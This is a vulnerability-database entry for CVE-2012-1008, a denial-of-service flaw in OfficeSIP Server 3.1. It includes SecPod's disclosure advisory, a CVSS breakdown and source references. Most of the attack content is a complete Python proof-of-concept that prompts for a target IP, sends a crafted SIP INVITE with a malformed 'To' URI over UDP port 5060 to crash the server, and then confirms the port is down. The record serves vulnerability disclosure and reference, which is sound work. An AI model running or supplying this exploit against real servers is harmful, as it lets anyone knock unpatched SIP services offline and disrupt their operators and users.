ID

VAR-E-201202-0193


CVE

cve_id:CVE-2012-1008

Trust: 1.9

sources: BID: 51828 // EXPLOIT-DB: 18453 // EDBNET: 40829

EDB ID

18453


TITLE

OfficeSIP Server 3.1 - Denial of Service - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 18453

DESCRIPTION

OfficeSIP Server 3.1 - Denial of Service. CVE-78997CVE-2012-1008 . dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 18453

AFFECTED PRODUCTS

vendor:officesipmodel:serverscope:eqversion:3.1

Trust: 1.6

vendor:officesipmodel:communications officesip serverscope:eqversion:3.1

Trust: 0.3

sources: BID: 51828 // EXPLOIT-DB: 18453 // EDBNET: 40829

EXPLOIT

##############################################################################
#
# Title : OfficeSIP Server Denial Of Service Vulnerability
# Author : Prabhu S Angadi SecPod Technologies (www.secpod.com)
# Vendor : http://www.officesip.com
# Advisory : http://secpod.org/blog/?p=461
# http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt
# http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py
# Software : OfficeSIP Server 3.1
# Date : 01/02/2012
#
###############################################################################

SecPod ID: 1034 22/12/2011 Issue Discovered
20/01/2012 Reported to Vendor
No Response
01/02/2012 Advisory Released

Class: Denial Of Service Severity: Medium

Overview:
---------
Office SIP Server version 3.1 is prone to a denial of service vulnerability.

Technical Description:
----------------------
The vulnerability is caused due to improper validation of SIP/SIPS URI in the
'To' header of the request, which allows remote attackers to cause denial of
service condition.

Impact:
--------
Successful exploitation could allow an attacker to crash the service.

Affected Software:
------------------
OfficeSIP Server 3.1

Tested on:
-----------
OfficeSIP Server 3.1 on Windows XP SP2 & SP3.
Older versions might be affected.

References:
-----------
http://www.officesip.com
http://secpod.org/blog/?p=461
http://www.officesip.com/download/OfficeSIP-Server-3.1.zip

Proof of Concept:
----------------
http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py

Solution:
----------
Not available

Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = PARTIAL
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Risk factor = Medium

Credits:
--------
Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this
vulnerability.

#!/usr/bin/python
##############################################################################
#
# Title : OfficeSIP Server Denial Of Service Vulnerability
# Author : Prabhu S Angadi SecPod Technologies (www.secpod.com)
# Vendor : http://www.officesip.com
# Advisory : http://secpod.org/blog/?p=461
# http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt
# http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py
# Software : OfficeSIP Server 3.1
# Date : 01/02/2012
#
##############################################################################

import socket,sys,time

port = 5060
target = raw_input("Enter host/target ip address: ")

if not target:
print "Host/Target IP Address is not specified"
sys.exit(1)

print "you entered ", target

try:
socket.inet_aton(target)
except socket.error:
print "Invalid IP address found ..."
sys.exit(1)

try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed service not running"
sys.exit(1)

#Malicous To SIP URI triggers vulnerability and brings SIP port down
exploit = "INVITE sip:test@officesip.local SIP/2.0\r\n"+\
"Via: SIP/2.0/UDP example.com\r\n"+\
"To: user2 <sip:malicioususer@>\r\n"+\
"From: user1 <sip:user1@server1.com>;tag=00\r\n"+\
"Call-ID: test@server.com\r\n"+\
"CSeq: 1 INVITE\r\n"+\
"Contact: <sip:user1@server1.com>\r\n\r\n"

sock.sendto(exploit, (target, port))
#Server evaluates and takes a while to go down.
time.sleep(40)
sock.close()

#Verify port is down
try:
sock.connect()
except:
print "OfficeSIP server port is down."
print "Service not responding ...."
sys.exit(1)

Trust: 1.0

sources: EXPLOIT-DB: 18453

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 18453

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 18453

TYPE

Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 18453

CREDITS

SecPod Research

Trust: 0.6

sources: EXPLOIT-DB: 18453

EXTERNAL IDS

db:NVDid:CVE-2012-1008

Trust: 1.9

db:EXPLOIT-DBid:18453

Trust: 1.6

db:EDBNETid:40829

Trust: 0.6

db:BIDid:51828

Trust: 0.3

sources: BID: 51828 // EXPLOIT-DB: 18453 // EDBNET: 40829

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-1008

Trust: 1.6

url:http://secpod.org/advisories/secpod_exploit_officesip_server_dos_vuln.txt

Trust: 1.3

url:https://www.exploit-db.com/exploits/18453/

Trust: 0.6

url:http://www.officesip.com/index.html

Trust: 0.3

sources: BID: 51828 // EXPLOIT-DB: 18453 // EDBNET: 40829

SOURCES

db:BIDid:51828
db:EXPLOIT-DBid:18453
db:EDBNETid:40829

LAST UPDATE DATE

2022-07-27T09:50:01.109000+00:00


SOURCES UPDATE DATE

db:BIDid:51828date:2012-02-09T12:00:00

SOURCES RELEASE DATE

db:BIDid:51828date:2012-02-02T00:00:00
db:EXPLOIT-DBid:18453date:2012-02-02T00:00:00
db:EDBNETid:40829date:2012-02-02T00:00:00